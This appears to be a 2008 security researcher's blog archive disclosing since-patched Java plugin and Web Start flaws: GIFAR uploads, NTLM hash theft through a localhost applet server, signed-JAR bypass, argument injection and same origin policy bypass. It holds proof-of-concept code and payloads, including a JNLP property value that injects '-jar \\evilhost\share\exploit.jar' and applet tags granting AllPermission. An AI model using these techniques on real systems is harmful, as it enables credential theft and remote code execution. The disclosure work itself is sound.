Saturday 2 August 2008

On GIFARs

The Black Hat Briefings 2008 are fast approaching. As I mentioned in my previous post on stealing password hashes, I am speaking with Nate McFeters and Rob Carter; you can find the abstract for our talk here.


One of the areas that we'll be talking about is some quality research carried out by Billy Rios (Billy was originally due to speak with us but is no longer; he is giving his Bad Sushi talk though, so check it out). Billy realised that you can make a JAR archive look like a GIF image (dubbed a "GIFAR"), or in more general terms, that you can make a JAR look like many other file types. He is not alone in this observation; PDP has also been working on similar ideas. Now many websites allow you to upload specific types of content - images for example. Most web applications will check the extension of the uploaded files, and many will also do some content inspection to make sure the file is what the extension says it is.


This means we can upload a JAR onto a publicly accessible page (e.g. a profile page). This has interesting implications. Suppose you end up running malicious content in your browser. Ordinarily it would not be able to fully interact with other websites you might be logged into (CSRF does not constitute full interaction); this is a tenet of the same origin policy implemented by all browsers. However, what if the malicious content contains an APPLET tag that references the JAR file uploaded to the target site? The Java browser plugin sees a codebase URL of the target site and consequently adds a SocketPermission allowing the applet to connect back to it and make full requests.
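In HTML terms, the attacker's page might carry something along these lines (the class name, file name and host are made up purely for illustration):

<APPLET code="Evil" archive="avatar.gifar" codebase="http://victim.example/uploads/" width="1" height="1"></APPLET>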


But that is only part of the story. It turns out that when an applet makes an HTTP request to a website, the Java browser plugin will slap on the relevant cookies from the browser cookie store (even if the applet is unsigned). This initially surprised me - as far as I can remember, older versions of the JRE never supported this. A little digging into how this is accomplished in IE revealed there is a class, com.sun.deploy.net.cookie.IExplorerCookieHandler, that contains the following native methods:



JNIEXPORT jstring JNICALL Java_com_sun_deploy_net_cookie_IExplorerCookieHandler_getCookieInfo
(JNIEnv *env, jobject sender, jstring url)

JNIEXPORT void JNICALL Java_com_sun_deploy_net_cookie_IExplorerCookieHandler_setCookieInfo
(JNIEnv *env, jobject, jstring url, jstring value)


These methods call the Wininet functions InternetGetCookie and InternetSetCookie respectively. Now if only there was a way of calling these functions with arbitrary URLs... (seriously I don't have one! At least I don't yet.)


So to summarise: once the malicious content references an applet hosted on the target site, it can send arbitrary requests to that site and parse the responses; if you are logged in, these requests will be made with your cookies, giving the applet full control of your account.
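To make that concrete, here is a minimal sketch of the sort of thing the uploaded applet could do; the path being fetched is hypothetical and error handling is kept to a bare minimum:

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class ProfileReader extends Applet
{
    // Fetch an authenticated page from the host we were loaded from.
    // The plugin appends the browser's cookies for this host, so the
    // response reflects the victim's session.
    public String fetch()
    {
        StringBuilder sb = new StringBuilder();
        try
        {
            URL u = new URL(getCodeBase(), "/account/settings");
            HttpURLConnection c = (HttpURLConnection) u.openConnection();
            BufferedReader r = new BufferedReader(new InputStreamReader(c.getInputStream()));
            String line;
            while ((line = r.readLine()) != null)
            {
                sb.append(line).append('\n');
            }
            r.close();
        }
        catch (Exception ex)
        {
            ex.printStackTrace();
        }
        return sb.toString();
    }
}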


Billy's research is getting a fair amount of press (with some creative headlines) prompting Nate to make some further clarifications on his blog. In some of the articles that are appearing credit is wrongly being attributed to me/my employer/Nate/Black Hat hackers/those pesky kids/our new GIFAR overlords and so on, so I'm setting the record straight: this is Billy's baby.


Anyway, that's a brief summary of the issue. Hopefully I'll have time to put out another post before Black Hat. If not, hope to see you there.




Cheers

John

Wednesday 9 July 2008

Time to update your JRE again

[ Edit: Brian Krebs of the Washington Post's Security Fix blog spoke to me about Java security. You can read his column here. ]


Sun have just released JRE Version 6 Update 7... which means 90% of desktops are currently at risk until they are upgraded!* If you have the Java Update Scheduler enabled, you should get prompted to update soon (depending on the update frequency you selected). If you want to be proactive, fire up the Java Control Panel, click on the Update tab, then click the Update Now button, or head to http://www.java.com and download the binary directly.


According to Sun's Security Blog the latest update fixes 8 issues. I'll be releasing advisories and blogging on the issues that I had a hand in, namely:


    238666 Native code execution through malformed TrueType font headers in untrusted Java applet.

    238905 Multiple buffer overflows in Java Web Start JNLP handling

    238905 Security problems with the JRE family version support


If you're thinking the first two issues sound all too familiar, you'd be right. I previously discussed this font issue that led to execution of arbitrary code. And the JNLP parsing code has had a number of similar buffer overflows (details here, here and here) ... not so much "same bug, different app" (the theme of this Brett Moore presentation) as "same bug, same app!"


So perhaps the most interesting vulnerability is 238905, the JRE family version support issue. You may have noticed that JRE updates typically install alongside older versions, so a given machine is likely to have several versions installed, as noted by Brian Krebs. Prior to the introduction of Secure Static Versioning in JRE Version 5 update 6, it was possible for an applet to select the version of the JRE with which to run. Of course, a malicious applet could purposefully select an older, vulnerable version in order to exploit known security flaws. Secure Static Versioning fixed this; however, during my tests I was able to circumvent it and downgrade the browser's JRE. More on this in a future post.


I'll also be blogging on a couple of other issues Sun have recently fixed. There are no SunSolve entries for these since they turned out to be flaws in the interaction between Java Web Start and Sun's web servers when installing alternate versions of the JRE as specified in JNLP files. They ultimately allowed us to present bogus security dialogs to the user, duping them into installing an older version of the JRE. These issues serve as a reminder of the dangers of including user-supplied input in security-related dialog boxes.


So a few things in the pipeline; I haven't forgotten about part II of Stealing Password Hashes with Java and IE but it's a busy time and Black Hat is almost upon us so be patient :)



Cheers


John


* JavaOne Keynote, 2008 - 90% of desktops run Java SE. This is unsurprisingly slightly higher than Adobe's reckoning.

Saturday 21 June 2008

A Different Form of JAR Hell

In my last post I used a Java applet to steal password hashes. Part two, covering NTLMv2, is on its way. Today however, I'm going to discuss SunSolve #233323 - a vulnerability that was fixed in the March updates to the JRE. Anyone who caught my ToorCon talk will have already heard me discuss this issue.


Java Web Start has provision for resources: signed JAR files that contain either Java classes or native libraries and that can be cached for use by one or more applications. JARs containing Java classes are extracted as per the usual Java caching mechanism (i.e. written to disk using randomly generated names), whereas native libraries are extracted with their original filenames. Interestingly, filenames can include parent path sequences (e.g. ..\..\..\..\test.txt). This means that "nativelibs" can be written outside the cache folder. But that's ok because nativelib resources need to be signed and therefore explicitly trusted by the user, right?


Not exactly. Take a look at the following code snippet, which resembles the vulnerable Java Web Start code, and see if you can spot the bypass (it's not exactly obvious):


try
{
    // Open the JAR file specifying true to indicate
    // we want to verify the JarFile is signed.
    JarFile jf = new JarFile(UserSuppliedFile, true);

    Enumeration e = jf.entries();
    while (e.hasMoreElements())
    {
        ZipEntry ze = (ZipEntry) e.nextElement();
        InputStream i = jf.getInputStream(ze);
        byte b[] = new byte[i.available()];
        i.read(b);

        // Call our method to write the bytes
        // to disk
        WriteFileToDisk(ze.getName(), b);
    }
}
catch (SecurityException se)
{
    // Some sort of signature verification error
    System.out.println("Security Error: " + se.toString());
}
catch (IOException ioe)
{
    System.out.println("File Error: " + ioe.toString());
}


If you spotted the problem, well done! If not, here's a hint courtesy of an IBM article on signed JARs:


Each signer of a JAR is represented by a signature file with the extension .SF within the META-INF directory of the JAR file. The format of the file is similar to the manifest file -- a set of RFC-822 headers. As shown below, it consists of a main section, which includes information supplied by the signer but not specific to any particular JAR file entry, followed by a list of individual entries which also must be present in the manifest file. To validate a file from a signed JAR, a digest value in the signature file is compared against a digest calculated against the corresponding entry in the JAR file.


What if a file doesn't have a corresponding manifest entry? It turns out the above code will happily call WriteFileToDisk anyway and there'll be no exception thrown. We can use this bypass to append a file to a signed resource and have it drop a java.policy file in the user's home directory allowing applets and Web Start applications to do bad things.

Let's take a look at how the Jarsigner tool that ships with the JDK validates signed JARs. Jarsigner correctly detects JARs containing both signed and unsigned content:



The code snippet below shows the enumeration of the JAR's entries; it's taken from sun.security.tools.JarSigner:


Enumeration e = entriesVec.elements();

long now = System.currentTimeMillis();

while (e.hasMoreElements()) {
    JarEntry je = (JarEntry) e.nextElement();
    String name = je.getName();
    CodeSigner[] signers = je.getCodeSigners();
    boolean isSigned = (signers != null);
    anySigned |= isSigned;
    hasUnsignedEntry |= !je.isDirectory() && !isSigned
                        && !signatureRelated(name);


The code retrieves the entry's CodeSigners; if there are none the entry is deemed unsigned.
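Applying the same check to the extraction loop shown earlier gives something like the sketch below. This is just my illustration of the principle, not Sun's actual fix; note that getCodeSigners() only returns a meaningful value once the entry has been read to the end of its stream:

while (e.hasMoreElements())
{
    JarEntry je = (JarEntry) e.nextElement();
    InputStream in = jf.getInputStream(je);
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    byte[] buf = new byte[8192];
    int n;
    while ((n = in.read(buf)) != -1)
    {
        baos.write(buf, 0, n);
    }
    in.close();

    // The signature files themselves are unsigned, so skip the check
    // for META-INF entries; anything else without a signer is rejected.
    if (!je.isDirectory() && je.getCodeSigners() == null
        && !je.getName().toUpperCase().startsWith("META-INF/"))
    {
        throw new SecurityException("Unsigned entry: " + je.getName());
    }

    WriteFileToDisk(je.getName(), baos.toByteArray());
}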


As an aside, it's actually possible to fool Jarsigner. Take a look at the signatureRelated method, which is called above:


/**
 * signature-related files include:
 * . META-INF/MANIFEST.MF
 * . META-INF/SIG-*
 * . META-INF/*.SF
 * . META-INF/*.DSA
 * . META-INF/*.RSA
 */
private boolean signatureRelated(String name) {
    String ucName = name.toUpperCase();

    if (ucName.equals(JarFile.MANIFEST_NAME) ||
        ucName.equals(META_INF) ||
        (ucName.startsWith(SIG_PREFIX) &&
         ucName.indexOf("/") == ucName.lastIndexOf("/"))) {
        return true;
    }


Jarsigner ignores unsigned files that start with the prefix "META-INF/SIG-":



Anyway, back to the Web Start issue. Soon after discovering this bug I realised it was effectively moot, for I hadn't seen any security dialogs even when working with fully signed JARs. It turned out there were none. Ever. You could even use a self-signed JAR! Still, it's a great example of a managed language providing a simple interface (JarFile) that masks a complex implementation; if the contract between the caller and the callee is not clearly defined (however simple the interface), developers can write insecure code without knowing it.


So that's it for now. There's also some interesting behaviour when loading applets containing signed and unsigned content but I'll save that for another day.



Cheers

John

p.s. In case you were wondering, JAR hell is Java's form of DLL hell.

Thursday 5 June 2008

Stealing Password Hashes with Java and IE





Consider for a moment the state of client-side bugs 5 or 6 years ago. Attacks such as this, a multi-stage miscellany of IE and Media Player bugs that resulted in the "silent delivery and installation of an executable on the target computer, no client input other than viewing a web page", were reported with regularity. Gradually this type of attack gave way to exploitation of direct browser implementation flaws such as the IFRAME overflow and DHTML memory corruption flaws. So what has become of the multi-stage attacks - have they become redundant? The answer to this, which I'm sure you can guess, is a resounding "no" and will be emphatically demonstrated in my upcoming Black Hat talk "The Internet is Broken: Beyond Document.Cookie - Extreme Client Side Exploitation", a joint double-session presentation with Billy Rios, Nate McFeters and Rob Carter.


As a teaser for that, I'm going to revisit an old attack - pre-computed dictionary attacks on NTLM - and discuss how we can steal domain credentials from the Internet with a bit of help from Java. I'm going to split it into two posts. In this post we'll apply the attack to Windows XP (a fully patched SP3 with IE7). In my next post we'll consider its impact on Windows Vista.


NTLM Fun and Games

The weaknesses of NTLM have long been understood (and documented and presented), so I'm not going to cover them in detail here. For the interested reader I recommend this L0phtCrack Technical Rant and Jesse Burns's presentation from SyScan 2004, NTLM Authentication Unsafe. The pre-computed dictionary attack on NTLM that we are interested in has also already been implemented in tools such as PokeHashBall. In a nutshell, this attack works as follows:


  1. Position yourself on the Intranet.

  2. Coerce a client, either actively or passively, into connecting to a service (such as SMB or a web server) on your machine.

  3. Request authentication and supply a pre-selected challenge.

  4. Capture the hashes from the NTLM type 3 message and crack them using rainbow tables or brute force.

A requirement of this attack is for the attacker to be located on the Intranet. There have been suggestions on how to remove this necessity; see this post for a discussion on DNS rebinding as a potential solution. Let's take a step back though and begin by reviewing IE's criteria for determining whether a site is located on the Intranet or the Internet:



By default, the Local Intranet zone contains all network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), as long as they are not assigned to either the Restricted Sites or Trusted Sites zone


Let's focus on names that do not include periods. As Rob Carter has pointed out, there are more than a few home/corporate products that install web servers bound to localhost, and since http://localhost meets the above criteria, XSS in these products lets us control content in the Local Intranet Zone. If we were therefore able to fully control a web server on the local machine, headers and all, and we were able to cause IE to connect to it, we could ask IE to authenticate, allowing us to use a pre-selected challenge in order to carry out a pre-computed dictionary attack. But how does a malicious website run a web server on your machine? This is where the Java browser plugin comes into play...


A Web Server in Java

There is nothing to stop an unsigned Java applet from binding a port, provided the port number is greater than 1024. The same origin policy, which I've discussed previously, is enforced when the applet accepts() a connection from a client; only the host from which the applet was loaded is allowed to connect to the port. If a different host connects, a security exception is thrown, as shown below.



This means that if we can make the applet think it was loaded from localhost, we can bind a port and act as a web server, serving requests originating from localhost. I have previously covered two ways of manipulating the applet codebase (the verbatim protocol handler and defeating the same origin policy), but these flaws are now patched. We can accomplish the same effect on the most recent Java browser plugin by forcing content to be cached in a known location on the file system and by referencing it using the file:// protocol handler*. So if we know that our class was stored at c:\test.class for example, we could load it via the following APPLET tag (the default directory is the desktop hence the ..\..\..\):


<APPLET code="test" codebase="file:..\..\..\"></APPLET>


The result of loading content from the local machine is that a SocketPermission is added allowing the applet to bind a port and accept connections from localhost.


So this attack effectively boils down to caching content in a known location. The Java applet caching mechanism stores content at %UserProfile%\Application Data\Sun\Java\Deployment\cache (or equivalent under Protected Mode on Vista). Class files and JARs are given randomly generated names (and that's SecureRandom, before you ask). There are, however, multiple ways of silently getting content onto the local machine with a fixed name. And that's all I'm going to say for now; we'll be addressing this topic further in our Black Hat talk :)


The Windows Firewall

What about the Windows firewall, you may ask? The trick is to make sure we bind to 127.0.0.1 only, as doing so will not trigger a security dialog. This is accomplished in Java as follows:


ServerSocket ss = new ServerSocket(port, 0, InetAddress.getByName("127.0.0.1"));


Actually it turns out that on Vista in order for our web server applet to work at all, we must call the ServerSocket(int port, int backlog, InetAddress bindAddr) constructor anyway rather than simply ServerSocket(int port). Calling ServerSocket(int port) will bind using IPv6 as well as IPv4; when we then point IE to http://localhost, it will connect to the IPv6 endpoint and throw the following exception:



The reason for this is that the Java code adds a SocketPermission for 127.0.0.1 which is obviously IPv4 only.


Putting it all together

The code for the web server applet is very simple. We needn't implement a full, multi-threaded web server; all we really need to do is send an HTTP/1.1 401 return code with a WWW-Authenticate header of NTLM in response to IE's first request. This will trigger the NTLM exchange of base-64 encoded messages. Since NTLM authenticates connections we must remember to send a Content-Length header (even if there's no content, i.e. Content-Length: 0) to ensure the connection stays open. There are several resources out there that provide detailed NTLM specs and examples. I used this one.
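As a rough sketch (written here as a standalone program rather than an applet, and with the NTLM type 1/2/3 message handling left out), the first leg of the exchange looks something like this; the port and class name are arbitrary:

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;

public class NtlmTrap
{
    public static void main(String[] args) throws Exception
    {
        ServerSocket ss = new ServerSocket(8080, 0, InetAddress.getByName("127.0.0.1"));
        Socket s = ss.accept();

        // Consume the request headers from IE
        BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
        String line;
        while ((line = in.readLine()) != null && line.length() > 0) { }

        // Demand NTLM; Content-Length: 0 keeps the connection open so the
        // type 1 and type 3 messages arrive on the same socket
        Writer out = new OutputStreamWriter(s.getOutputStream(), "US-ASCII");
        out.write("HTTP/1.1 401 Unauthorized\r\n"
            + "WWW-Authenticate: NTLM\r\n"
            + "Content-Length: 0\r\n"
            + "\r\n");
        out.flush();

        // ...read the type 1 message, reply with a type 2 containing our
        // pre-selected challenge, then capture the type 3 response...
    }
}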


The HTML page that we use to tie the attack together consists of multiple hidden IFRAMEs: firstly to load the Java browser plugin and cache the content, then to launch the web server applet from file://, then to make a request to http://localhost. For my PoC I created a 2nd applet to display the progress of the attack and to allow me to easily copy and paste the hashes out of the browser; a sample capture is shown below. Obviously in a real attack we'd want to ship the hashes off the victim's box either via JavaScript or Java.



Once we have the hashes, we can use rainbow tables to crack the first 7 characters of the LM response or brute force via a password cracker that can handle captured NTLM exchanges, such as John the Ripper with this patch. We can then brute force the remainder of the password. For anyone interested in the approaches to cracking NTLM, I recommend warlord's Uninformed paper, Attacking NTLM with Precomputed Hashtables.



Summary

So to summarise the above: if a user on a domain-joined XP machine with the Java browser plugin visits a malicious website with IE, the malicious website can steal their username, domain name and a challenge-response pair in order to carry out a pre-computed dictionary attack, likely revealing the user's password in a short time.


Once again this is not a new attack - there are a good many tools that implement the well known NTLM attacks such as SMBRelay, ScoopLM and Cain & Abel. The delivery and execution of this attack, however, demonstrates that multi-stage client-side attacks are alive and well...


That's it for now. Next time we'll consider how this attack applies to Vista, which enforces the more secure NTLMv2 by default.




Cheers

John


*Note that unlike Flash, Java implements its own protocol handlers rather than relying on the browser's.

Thursday 17 April 2008

And For My Next Trick...

One of the examples given in the "Attacking Application Logic" chapter of The Web Application Hacker's Handbook is entitled "Escaping from Escaping". The prelude to the attack is that the developer has to pass user-supplied input as a parameter to an OS command. Realising that meta-characters in the user data are dangerous, the dev sets out to escape them. The flaw is quite simply that the dev forgets to escape the escape character itself, so the attacker can use it to sneak dangerous characters through.


Today I'll show a real world example of this attack, a bug I reported to Sun that was recently patched in Sun Alert 233323. Firstly though, some background. Sun released Java Web Start in 2001 as a means of one-click deployment of Java applications from the browser (the Java equivalent of .NET's ClickOnce technology). As Web Start applications run outside the browser, they can easily be made available to run offline. The security model enforced on applets still applies to Web Start - unsigned applications cannot interact with the filesystem, and access to remote content is subject to the same origin policy.


The architecture of Web Start is interesting. Applications are installed and launched via XML-based JNLP configuration files. JNLP files open with javaws.exe, a native application, whose purpose is to parse the JNLP file and launch javaw.exe (i.e. invoke the JVM) with the correct class.
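For anyone who hasn't looked inside one, a minimal JNLP file looks something like this (the codebase, JAR and class names are illustrative):

<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://example.org/app" href="app.jnlp">
  <information>
    <title>Example application</title>
    <vendor>Example Corp</vendor>
  </information>
  <resources>
    <j2se version="1.6+"/>
    <jar href="app.jar"/>
    <property name="sun.java2d.noddraw" value="true"/>
  </resources>
  <application-desc main-class="example.Main"/>
</jnlp>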


The JNLP parser has suffered a slew of buffer overflows, which I may talk about in a future post. It's also had an argument injection vulnerability, found by Jouko Pynnonen. This could be triggered via the property tag of the JNLP file, which allows certain JVM properties to be set. These properties are passed on the command line to the javaw.exe process. Jouko gave the following example:


<property name="sun.java2d.noddraw" value="true HELLO" />


The property "sun.java2d.noddraw" is considered secure by Web Start (there's a list of the permitted properties in the spec); ultimately the startup command for the application became something like:


javaw.exe -Dsun.java2d.noddraw=true HELLO (other args) your.application


This issue was fixed way back in September 2004 by quoting the input and escaping the double quote character. But guess what wasn't escaped? By inserting an additional "\" into the argument, we can gobble up the escape character, allowing us to insert an additional double quote and thereby pass arbitrary arguments as before.


This vulnerability can be exploited in several ways. Perhaps the easiest is to create an SMB share with null credentials containing the payload Jar file, then reference it as follows in the JNLP:


<property name='http.agent' value='\" -jar \\evilhost\share\exploit.jar \"'/>


The resulting command line effectively boils down to: java -jar \\evilhost\share\exploit.jar with the rest of the line passed as arguments (which our payload can just ignore):


Arg 0: \
Arg 1: -Djnlpx.splashport=4741
Arg 2: -Djnlpx.jvm="C:\Program Files\Java\jre1.6.0_02\bin\javaw.exe"
Arg 3: com.sun.javaws.Main
Arg 4: C:\DOCUME~1\John\LOCALS~1\Temp\javaws114


Of course, this technique may not work if outbound SMB is blocked by a personal or corporate firewall (which is pretty likely these days). I will leave the other techniques for exploiting this as an exercise for the reader :) [Hint: explore ways of caching various types of content via the Java browser plugin]


So what lessons should we take from this affair?


For security researchers:


  • It's worth revisiting patches with the mentality that new code = new bugs. I am as guilty as anyone of not doing this - you send a bug off to a vendor, a while later they fix it and ship a patch, by then you're working on something completely different. History has shown us time and time again it can take more than one attempt to fix a bug (and that other bugs in nearby code may be missed if the code is not scrubbed).


For software vendors:


  • When a vulnerability report comes in, understand fully how the attacks work and review your fixes with a critical eye. Fixing code is an iterative process and should be done from both perspectives, defender and attacker (asking yourself at every step of the way, what new avenues of attack have we just opened up?). For an example of a bug that dragged on way longer than it should have (due to flaws in the fixes) check out the section on the ExtProc saga in The Database Hacker's Handbook.


Anyway, this is just one of many Java flaws I will be discussing during my ToorCon talk this weekend. If you're not going to be there and you'd like a copy of my slides, drop me a note.


Cheers


John

Tuesday 8 April 2008

Third Party Kill Bits

[Update: I was wrong... It seems Microsoft has previously released kill bits for third party software. Thanks to Edi and David for notifying me of this; I've updated this post accordingly.]


Just a quick post today. It's the second Tuesday of the month, which means it's Patch Tuesday. Browsing over the bulletins, there are some interesting ones as always, but MS08-023 caught my eye in particular:


This update includes kill bits that will prevent the following ActiveX controls from being run in Internet Explorer:


Yahoo! has released a security bulletin and an update that addresses the vulnerability in Yahoo! Music Jukebox. Please see the security bulletin from Yahoo! for more information and download locations. This kill bit is being set at the request of the owner of the ActiveX control. The class identifiers (CLSIDs) for this ActiveX control are:


• {5f810afc-bb5f-4416-be63-e01dd117bd6c}


• {22fd7c0a-850c-4a53-9821-0b0915c96139}


Firstly, a recap. A kill bit is a registry setting that prevents an ActiveX control from being instantiated in Internet Explorer. Microsoft have used kill bits extensively over the last few years to mitigate security issues in their own controls; these have been pushed out via Windows Update. Other software vendors have also used kill bits but have had no unified means of pushing out updates. This has led to a plethora of systray applications running constantly, checking for security updates. As annoying as these can be, the alternative, that the end user must periodically go and check for new updates, is not a secure, scalable solution.
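For reference, the kill bit itself is just the 0x400 flag in a control's "Compatibility Flags" registry value; setting it by hand for the first Yahoo! CLSID above would look something like this:

C:\>reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5f810afc-bb5f-4416-be63-e01dd117bd6c}" /v "Compatibility Flags" /t REG_DWORD /d 0x00000400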


To my knowledge, Microsoft hasn't previously provided kill bits over Windows Update for third party controls that do not come bundled with the OS [not true, read this footnote]. This one is for Yahoo! Music Jukebox, and the Microsoft bulletin even links to the Yahoo! Bulletin.


Personally I think it's a great idea for third parties to be able to have their kill bits pushed out over Windows Update. That said, I'd be interested in hearing some of the logistics of how this update came about - I'm hoping the Microsoft Security Response team will talk about this in the future. Some of the things I'm wondering are:


  • What is the process for a third party to request that Microsoft kill bit a control?

  • Can any company request their controls be kill bit-ted?

  • If not, what are the criteria?

  • How does Microsoft verify the company is who it says it is, and has permission to kill bit the control?

Anyway, that's it for now. I'll be continuing my analysis of last month's JRE vulnerabilities in a new post later this week.



Cheers

John


Important footnote: It turns out Microsoft has released third party kill bits as hotfixes on at least two previous occasions. MS06-067 provided kill bits for WinZip 10, fixing the CreateNewFolderFromName() issue, and MS07-027 did the same for Acer and RIM vulnerabilities. I suspect there are others in previous bulletins too. I would still be interested to hear how these companies went about coordinating the update with Microsoft though.

Thursday 27 March 2008

Wake up and Smell the Coffee @ ToorCon

On April 19th I'm presenting at ToorCon in Seattle. My talk ("Wake up and smell the coffee: design flaws in the Java browser plugin") will be focused on some of the more interesting Java bugs I've found over the last few months, and how these can be exploited cross-browser, cross-platform and cross-architecture (making Java one of the scariest browser plugins there is, in my opinion). I haven't presented at ToorCon before (nor attended one for that matter) so I'm looking forward to it.


Of the talks already scheduled, several have caught my eye, including Richard Johnson's "Fast n Furious Transforms". Fourier Transforms and I were never the best of friends during my undergrad engineering degree, but I always have time for cross-discipline approaches in security, and Rich has given some great talks in the past (slides for which can be found here), so I will definitely be checking this one out.


I also noted that Adam Shostack is giving a talk entitled "SDL Threat Modeling: Past, Present and Future". Never was a truer word written than in the first line of his abstract: "Everyone thinks threat modeling is great, and then they encounter a formalized threat modeling process." I am looking forward to hearing his thoughts on the evolution of the SDL.


And finally, I'll get to see Nate McFeters discuss "URI Use and Abuse". Protocol handlers have provided a rich seam of vulnerabilities over the last few years and I hear Nate will be showing that things are likely to stay this way for a good while yet.


Anyway, if you're planning to go to ToorCon, drop me a line.




Cheers


John

Tuesday 18 March 2008

Defeating the Same Origin Policy: Part II

In my last post I gave details of how unsigned applets could bypass the same origin policy in order to make arbitrary network connections; the Sun alert for this issue is here. In this post I'll wrap up my discussion of this bug, showing how it can be used to compromise the host.


Bypassing the Java same origin policy is dangerous in itself - not only could a malicious applet port scan the internal network of the host that instantiates it - it could also interact with and exploit the services it finds. However, in most cases, bypassing the same origin policy (at least in the browser) does not obviously lead to a direct compromise of the host. This particular flaw is different.


Extensions in Java are groups of packages and classes that augment the runtime classes. Extensions are installed into a specified directory and consequently can be located by the JRE without having to explicitly name them on the class path. QuickTime for Java is an example of a Java extension; once installed it enables Java applications to play QuickTime media (and yes, it's had its share of security issues).


Moving on... take a look in your java.policy file (located in java.home\lib\security\java.policy) and you'll see where this attack is going. The first entry is most likely:


// Standard extensions get all permissions by default
grant codeBase "file:${{java.ext.dirs}}/*" {
    permission java.security.AllPermission;
};


You'll remember from last time that putting a URL in the code attribute allows an arbitrary codebase to be specified. Thus if you use a codebase that references the extensions directory (e.g. "C:\Program Files\java\jre1.6.0_03\lib\ext"), the applet is granted java.security.AllPermission. The Java documentation doesn't beat around the bush:


Granting AllPermission should be done with extreme care, as it implies all other permissions. Thus, it grants code the ability to run with security disabled. Extreme caution should be taken before granting such a permission to code. This permission should be used only during testing, or in extremely rare cases where an application or applet is completely trusted and adding the necessary permissions to the policy is prohibitively cumbersome.


The only thing left to do is come up with a reliable means of obtaining the path to the "JREx.y._zw\lib\ext" folder. The JRE version can be determined by querying the java.version property from a "bootstrapper" applet. It's probably safe to assume that on Windows platforms the JRE folder resides within the "Program Files\java" folder. As for the drive letter, the browser plugin prevents reading any properties that contain a path (so this rules out using java.home, java.class.path, user.name, user.home and user.dir). You could of course take a guess; "c:" is a pretty good candidate. There is one Windows-specific property, however, that can be read from an unsigned applet and that discloses a full path. The Windows Desktop Properties expose a win.xpstyle.dllName property that can be read as follows:


String dllName = (String)Toolkit.getDefaultToolkit().getDesktopProperty("win.xpstyle.dllName");


On my test box this returns "E:\WINDOWS\Resources\themes\Luna\Luna.msstyles".


So to conclude, the applet tag (which could obviously be generated dynamically) ends up looking like:


<APPLET code="http://2130706433/foo" codebase="file:E:\Program Files\java\jre1.6.0_03\lib\ext"/>


As for a payload, an applet with AllPermission can call Runtime.getRuntime().exec or System.loadLibrary to go straight to native code, fully compromising the browser.
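A toy payload sketch (the executable launched is just an example):

import java.applet.Applet;

public class Payload extends Applet
{
    public void init()
    {
        try
        {
            // With AllPermission there is no sandbox left to speak of
            Runtime.getRuntime().exec("calc.exe");
        }
        catch (Exception ex)
        {
            ex.printStackTrace();
        }
    }
}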



Cheers

John

Wednesday 12 March 2008

Defeating the Same Origin Policy: Part I

So last week Sun released updated versions of the Java Runtime Environment and with them, a host of Sun Alerts. These are neatly summarised on the Sun Security blog. Over the next few posts I am going to discuss the issues that I had a hand in reporting.


The first one I'm going to tackle is Sun Alert 233324, "A Security Vulnerability in the Java Plug-in May Allow an Untrusted Applet to Elevate Privileges"; the NGS advisory is here. Your first thought might be that we achieve the elevation of privilege through a buffer overflow - I blogged on buffer overflows in the JRE a while back, and if you read over the alerts Sun published last week, you'll see Java Web Start had several overflows fixed (I'll be discussing Sun Alert 233323, "Multiple Security Vulnerabilities in Java Web Start May Allow an Untrusted Application to Elevate Privileges" at a later date). However, if you read the brief description of this bug you'll see it's a little more intriguing:


A security vulnerability in the Java Plug-in may allow an applet that is downloaded from a website to bypass the same origin policy and leverage this flaw to execute local applications that are accessible to the user running the untrusted applet.


I'm going to split the analysis of this issue into two parts. In this post I'm going to cover "bypassing the same origin policy"; in the next post I'm going to cover "leveraging this flaw to execute local applications". If anyone figures out the second part before I post it, add a comment or send me an email :)


So, part one, bypassing the same origin policy. The same origin policy effectively underpins browser security. It means that resources loaded from one origin cannot get or set properties of a resource from a different origin. The web app sec guys are always going on about this and coming up with new ways of bypassing the restriction. I find this research interesting but give me a browser 0day any day (so it's kinda ironic that I'm posting on it!). In the same way that client-side scripting languages enforce the same origin policy, Java implements a sandbox to limit network connectivity in untrusted applets. This is documented in the Java Security FAQ.


In a nutshell, unsigned applets are not allowed to open network connections to any host, except for the host that provided the .class files (either the host where the HTML page came from, or the host specified in the codebase parameter in the applet tag, with codebase taking precedence). Quite simply, if we try to create a connection to foo.com from an applet that did not originate from the machine foo.com, it will fail with a security exception.*


Applets are instantiated via the <APPLET> or <OBJECT> HTML tag. Both the code and codebase attributes/parameters must be set e.g. <APPLET code="foo" codebase="http://bar"/> will cause foo.class to be loaded from http://bar. The code that loads the class creates a URL object via the following constructor:


public URL(URL context,
String spec)
throws MalformedURLException


This constructor has an interesting property, namely:


If the authority component is present in the spec then the spec is treated as absolute and the spec authority and path will replace the context authority and path. If the authority component is absent in the spec then the authority of the new URL will be inherited from the context.


This effectively means that executing:


URL url1 = new URL("http://baz");
URL url2 = new URL(url1, "http://bar");


returns us url2 representing http://bar. So what happens if we instantiate an applet as follows:


<APPLET code="http://baz/foo" codebase="http://bar" />


Though the answer is probably obvious by now, we can use JSwat, the GUI Java debugger frontend, to confirm things.


Briefly, the steps are:


  • Configure JSwat for applet debugging (it's easiest to specify "suspend=y" so the debugger doesn't run away).

  • Set a breakpoint on the URL constructor and hit go. The breakpoint will fire quite a few times (we could set a conditional breakpoint to avoid this); we can view the parameters to the constructor via the Variables pane.

  • Eventually we should see the java.net.URL parameter holding the specified applet codebase (http://bar) and the java.lang.String parameter holding the specified code attribute (http://baz/foo). The screenshot below illustrates this for my internal PoC; the codebase was http://www.google.com and the code parameter was http://2130706433/connect (the reason for using 2130706433 will be explained shortly).


JSwat... it swats bugs.


So now we can definitively answer the question: it will load foo from baz but report the codebase as bar. We've defeated the same origin policy; our applet can connect to bar even though it was loaded from baz.


Of course, the devil is in the detail... there are some complications to get this attack working. Firstly, if we specify a code parameter containing a '.', e.g.:


<APPLET code="http://baz.com/foo" codebase="http://bar" />


